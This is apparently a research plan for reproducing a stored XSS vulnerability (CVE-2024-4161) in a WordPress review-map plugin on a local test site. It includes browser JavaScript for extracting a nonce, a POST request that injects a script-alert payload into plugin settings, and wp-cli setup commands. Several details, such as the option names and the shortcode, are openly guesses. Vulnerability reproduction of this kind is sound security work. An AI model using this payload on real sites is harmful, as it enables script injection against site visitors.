Research Plan: CVE-2024-4161 - Review Map by RevuKangaroo Stored XSS

1. Vulnerability Summary

The Review Map by RevuKangaroo plugin (versions <= 1.7) contains a stored cross-site scripting (XSS) vulnerability. The flaw exists because the plugin fails to sanitize or escape user-supplied input when saving and displaying its settings.

While the vulnerability requires Administrator+ privileges, it is significant in WordPress Multisite environments or installations where the unfiltered_html capability is disabled for administrators (e.g., by the DISALLOW_UNFILTERED_HTML constant). In these contexts, an administrator is restricted from using dangerous HTML, but this plugin provides a bypass by incorrectly handling setting updates.

2. Attack Vector Analysis

• Vulnerable Endpoint: Plugin settings page, typically located at /wp-admin/admin.php?page=review-map-settings (inferred) or via the WordPress Settings API at /wp-admin/options.php.
• HTTP Parameter: Specific setting fields (e.g., API keys, map titles, or custom CSS fields) saved in the wp_options table.
• Authentication: Required (Administrator or Super Admin).
• Preconditions:
  • Plugin installed and active.
  • unfiltered_html capability must be disabled (standard for non-Super Admins on Multisite).

3. Code Flow (Inferred)

1. Entry Point: The administrator navigates to the Review Map settings page.
2. Input: The admin enters a payload (e.g., <script>alert(1)</script>) into a configuration field and submits the form.
3. Processing: The plugin likely uses register_setting or a custom admin_init hook to process the POST request. It fails to apply sanitize_text_field() or wp_kses() before calling update_option().
4. Storage: The payload is stored raw in the database (wp_options).
5. Sink: When the map is rendered (via shortcode on the frontend or on the settings preview), the plugin retrieves the value using get_option() and echoes it directly without using esc_html(), esc_attr(), or wp_kses().

4. Nonce Acquisition Strategy

The plugin likely uses the WordPress Settings API or a standard admin form with a CSRF nonce.

1. Identify the Page: Use wp-cli to find the settings page slug:
   wp admin-menu list | grep "Review Map"
2. Navigate: Use browser_navigate to visit the settings page.
3. Extract Nonce and Fields: Use browser_eval to inspect the form.

   // Common patterns for Settings API or custom forms
   (() => {
     return {
       nonce: document.querySelector('input[name="_wpnonce"]')?.value,
       action: document.querySelector('form')?.action,
       option_page: document.querySelector('input[name="option_page"]')?.value,
       fields: Array.from(document.querySelectorAll('input[type="text"], textarea')).map(i => i.name)
     };
   })()
   

4. Note: If the plugin uses options.php, the nonce action is usually ${option_group}-options.

5. Exploitation Strategy

Step 1: Discover Input Fields

Access the settings page and identify which fields are available for modification.

• URL: /wp-admin/admin.php?page=review-map-settings (inferred)

Step 2: Inject Payload

Perform a POST request to update the settings with the XSS payload.
Note: We assume the plugin uses the standard options.php route.

• Method: POST
• URL: http://vulnerable-site.local/wp-admin/options.php
• Content-Type: application/x-www-form-urlencoded
• Payload:

  option_page=review_map_settings_group&
  action=update&
  _wpnonce=[EXTRACTED_NONCE]&
  review_map_api_key=<script>alert(document.domain)</script>&
  submit=Save+Settings
  

Step 3: Trigger Execution

Identify where the setting is reflected. This is typically on the frontend where the map is displayed.

1. Create a post with the plugin's shortcode.
2. Visit the post as any user.

6. Test Data Setup

1. Install Plugin: Ensure Review Map by RevuKangaroo <= 1.7 is active.
2. Restrict Capabilities: Add define( 'DISALLOW_UNFILTERED_HTML', true ); to wp-config.php to simulate the vulnerable environment for the Admin user.
3. Create Target Page:
   wp post create --post_type=page --post_title="Review Map Page" --post_status=publish --post_content='[revukangaroo_map]' (Shortcode inferred from plugin name).
4. Create Admin:
   wp user create attacker admin@example.com --role=administrator --user_pass=password

7. Expected Results

• The settings update should succeed.
• Navigating to the page containing the shortcode (or returning to the settings page) should trigger a JavaScript alert box, confirming the payload was stored and executed without escaping.

8. Verification Steps

1. Check Database: Verify the payload is stored raw.
   wp option get review_map_api_key (inferred option name).
2. Check Frontend Source:
   Use http_request to fetch the frontend page and grep for the raw payload.
   grep "<script>alert(document.domain)</script>" response_body.html

9. Alternative Approaches

If the plugin does not use options.php:

1. Custom AJAX: Check for wp_ajax_ hooks in the code. If found, use admin-ajax.php with the appropriate action and nonce.
2. Custom Admin Post: Look for admin_post hooks and send the request to admin-post.php.
3. Frontend Reflected: If the settings page itself reflects the value immediately after saving, the XSS will trigger in the Admin's own browser first.